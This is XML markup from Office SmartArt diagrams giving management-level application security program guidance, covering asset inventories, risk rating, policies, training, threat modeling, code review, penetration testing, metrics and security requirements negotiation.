    <dgm:cxn modelId="{48AAB212-71DA-4491-9654-7415FB51C308}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{11E452D5-8F7F-4C35-83BC-53F0647C259B}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8D1C1677-B6A3-41BD-9172-D7CF8A1CC0D9}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{286C205C-7705-4A53-8C18-C8E7EF199705}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7C34ED21-6657-4A94-915C-12E37FC966FA}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{20FC20BF-FD5E-41EF-9EB5-070EF18875CC}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E59F9A95-200F-42A4-BD23-884EE79FBB88}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4360DE27-BDD4-4BBE-93EC-11D8ECCF5C29}" type="presParOf" srcId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" destId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{783EC65E-F846-4D6E-AC1D-6DA867F34708}" type="presParOf" srcId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AE4AC549-CAAD-4CE5-8AC0-84E4DB749C42}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7F2930EF-2282-4737-B8ED-0133EE5AB8BC}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A792A45E-08FC-462A-90A0-F280BB083ED6}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EC92A7D6-82B5-4445-9F96-1081A436E749}" type="presParOf" srcId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" destId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1B32806D-7EE2-477D-8412-3E65680AE962}" type="presParOf" srcId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A7A8A066-134F-4C05-8645-4C7F4068D3B4}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{78713489-5D47-416E-ADAE-302406F812AE}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5E047A18-0E51-46AB-B90F-F7B0C73F34A7}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{87A1B6BB-3522-4456-9BEB-329CF9E0DF14}" type="presParOf" srcId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" destId="{50CC931A-2802-4A28-B17D-4CFEC4144601}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1174C7B4-11E6-4B18-BD13-70FD237624A3}"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93075" y="-2191458"/>
          <a:ext cx="980124"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a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Document all applications and associated data assets </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" kern="1200" noProof="0" dirty="0"/>
            <a:t>in a Configuration Management Database (CMDB).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="44450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1"/>
            </a:rPr>
            <a:t>application security program</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> and drive adoption. </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Conduct a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>capability gap analysis comparing your organization to your peers</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> to define key</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> improvement areas and an execution plan. </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Gain management approval and establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>application security awareness campaign</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> for the entire</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> IT organization.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2003361" y="146102"/>
        <a:ext cx="5511706" cy="884432"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="2678"/>
          <a:ext cx="909184"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t>Get Started</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1138560" y="47061"/>
        <a:ext cx="820418" cy="1082511"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4334773" y="-961617"/>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noProof="0" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>Identify </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0"/>
            <a:t>the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>protection needs</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0"/>
            <a:t>of your </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>application portfolio</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0"/>
            <a:t> from a business perspective.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> This should be driven in part by privacy laws and other regulations relevant to the data asset being protected.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Establish a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>common risk rating model</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> with a consistent set of likelihood and impact factors reflective</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> of your organization's tolerance for risk.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en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Accordingly measure and prioritize all your applications and APIs. Add the results to your CMDB. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" u="sng" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="1000" b="0" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>Establish assurance guidelines to properly define coverage and level of rigor required.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" b="0" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033071" y="1386760"/>
        <a:ext cx="5512877" cy="862796"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="1232520"/>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t>Risk Based Portfolio Approach</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="1278353"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4339580" y="268223"/>
          <a:ext cx="946532"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Establish a set of focused </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>policies and standards</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> that provide an application security baseline for all</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> development teams to adhere to.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Define a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>common set of reusable security controls </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>that complement these policies and standards and</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> provide design and development guidance on their use.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>application security training curriculum</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> that is required and targeted to different</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> development roles and topics.  </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033070" y="2620939"/>
        <a:ext cx="5513346" cy="854120"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="2462361"/>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Enable with a Strong Foundation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="2508194"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4324133" y="1498065"/>
          <a:ext cx="97742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Define and integrate </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>secure implementation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>verification</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> activities into existing development and</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> operational processes.  Activities include </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>threat modeling</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>, secure design &amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>, secure coding &amp; </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>code review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>penetration testing</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t>, and remediation.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Provide subject matter experts and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>support services for development and project teams</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> to be</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> successful.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033070" y="3836842"/>
        <a:ext cx="5511838" cy="881998"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="3692202"/>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Integrate Security  into Existing Processes</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="3738035"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4334773" y="2727906"/>
          <a:ext cx="956146" cy="5559552"/>
        </a:xfrm>
        <a:prstGeom prst="round2Same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57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> Manage with metrics. Drive improvement and funding decisions based on the metrics and analysis</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced,</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            <a:t> vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200"/>
            <a:t> Analyze data from the implementation and verification activities to look for root cause and</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200"/>
            <a:t> vulnerability patterns to drive strategic and systemic improvements across the enterprise. </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" kern="1200"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> Learn from mistakes and offer positive incentives to promote improvements.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033071" y="5076284"/>
        <a:ext cx="5512877" cy="862796"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="4922043"/>
          <a:ext cx="938893" cy="1171277"/>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a:t>Provide Management Visibility</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="4967876"/>
        <a:ext cx="847227" cy="1079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651728" y="-2243814"/>
          <a:ext cx="847725" cy="555098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a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" b="0" kern="1200" dirty="0"/>
            <a:t>Collect and negotiate the business requirements for an application with the business, including receiving the protection requirements in regard to confidentiality, integrity and availability of all data assets.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" noProof="0" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" b="0" kern="1200" dirty="0"/>
            <a:t>Compile the technical requirements including functional and non functional security requirements.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" b="0" kern="1200" dirty="0"/>
            <a:t>Plan and negotiate the budget that covers all aspects of design, build, testing and operation, including security activities.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1300101" y="149196"/>
        <a:ext cx="5509597" cy="764959"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="159318" y="1848"/>
          <a:ext cx="1140782" cy="10596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noProof="0" dirty="0"/>
            <a:t>Requirements and Resource Management</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="211046" y="53576"/>
        <a:ext cx="1037326" cy="956200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3651728" y="-1131175"/>
          <a:ext cx="847725" cy="555098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r>
            <a:rPr lang="en-AU" sz="800" kern="1200" noProof="0" dirty="0"/>
            <a:t>Negotiate with internal or external developers the requirements, including guidelines and security requirements with respect to your security program, e.g. SDLC, best practices.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" noProof="0" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" kern="1200" noProof="0" dirty="0"/>
            <a:t>Rate the fulfillment of all technical requirements including a rough planning and design phase.</a:t>
          </a:r>
